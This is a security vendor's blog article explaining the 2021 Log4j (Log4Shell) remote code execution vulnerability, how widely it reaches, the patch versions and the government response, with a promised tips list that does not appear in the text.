This article will explain the details and implications of the Log4j vulnerability, and give 7 tips to stay protected. Also known as Log4shell, experts are calling it one of the worst cybersecurity vulnerabilities ever exploited as it enables hackers to hijack critical infrastructure systems and computer networks via the ubiquitous open-source Apache logging library. Many private and public organizations are affected by this zero-day vulnerability, which has grabbed headlines and sent both CISOs and government agencies scrambling to contain the security flaw. CISA and the Department of Homeland Security issued Emergency Directive 22-02, ordering all hands on deck with federal agencies to patch the vulnerability and squash the bug before something really bad happens.
Log4j is an open-source logging framework developers use to record activity within an application by logging security and performance information. The software, written in Java programming language, runs across many platforms including macOS, Windows, and Linux and touches a vast array of organizations, services and products. The Log4J code is seemingly woven into the very fabric of the digital world, from consumer and enterprise services to websites and applications, and on to the operational technology products that monitor critical infrastructure (like power generation and food production) and which controls robots in industrial processes and manufacturing. Managed by volunteers in the Apache Software Foundation, Log4J powers everything from web cams to car navigation systems to medical devices, and it really is virtually everywhere: Twitter, Amazon, Microsoft, Minecraft, to name but a tiny few.
The vulnerability offers something like a skeleton key to controlling the myriad systems operating on Log4J. The vulnerability allows a malicious actor to perform a remote code execution (CVE-2021-44228) attack on an affected platform, which ultimately lets users write code to execute whatever command they like and take control of those systems. It’s an easy exploit to execute; hackers just write in a malicious piece of code through the vulnerability, wait for it to get logged, and then enjoy control over that system. Infosec teams at federal, state, and corporate levels are scurrying to patch the vulnerability and shut all the open doors through which hackers have entered. The first Apache patch, version 2.15, was followed by 2.16 and then 2.17, which protects against a denial of service attack, in which hackers block authorized users’ access to their network. Make sure you're always updated to the latest version to gain the latest protections!
The cybersecurity and infrastructure security agency, CISA, has ordered federal civilian agencies to apply patches before Christmas. Meanwhile, juggernaut tech companies like IBM, Cisco and VMware are burning the midnight oil to fix Log4j vulnerabilities in their products. The security flaw is rare for the outsized threat it poses compared to the rudimentary skills required to exploit it.
The Hoxhunt platform is not impacted by the vulnerability. Hoxhunt services do not include any technology vulnerable to the Log4j (CVE-2021-44228) vulnerability. Some of Hoxhunt’s subcontractors do use Log4j, but based on our analysis and their response so far, they don’t use it in a way that would affect Hoxhunt
We are in the detection and response phase of this massive attack. Cybersecurity teams are racing to detect what systems have been compromised and for how long, in order to calibrate their response. The vulnerability was reported to Apache by Chinese retail platform, Alibaba on Nov. 24, and the first patch was released two weeks later. But it’s unknown which organizations and which systems have been affected (here’s an ongoing list), how long attackers were able to creep around unseen, and what their ultimate intentions are. As of the winter holidays season, 2021-2022, we are bracing for the worst that’s sure to come.
It is expected that the Log4j hacking will come in waves. The initial hacks have involved cryptominers deploying malware into compromised systems to use them for the resource-intensive enterprise of mining cryptocurrency. But it’s known that state-sponsored hackers are involved in this attack, and extortion and ransomware attacks are anticipated in the next wave of attacks.
Forrester provides a freaky insight into the fact that Alibaba, as a Chinese company, was legally required to first disclose the vulnerability to the Chinese government, a hostile cyber adversary to the United States, before reporting the vulnerability to Apache in November. Basically, China at the state level had an unknown amount of time to figure out ways to exploit Log4J before it was even reported to Apache and the world. Yikes.
There is very little that end users can do to help defend against the Log4j threat. But infosec teams are likely to have their hands full in the coming weeks protecting themselves and their customers. Here are a few guidelines to protecting your systems from attack.
And finally: Laugh. The one upside to Log4j has been the epic rush of memes. With all the uncertainty and chaos surrounding the Log4j fiasco, seek out some good ol gallows humor where you can to relieve the stress and cope with the emergency. Here are a couple Hoxhunt memes courtesy of Hoxhunt's own Art Director, Rosanna Salminen keep up your holiday spirit.
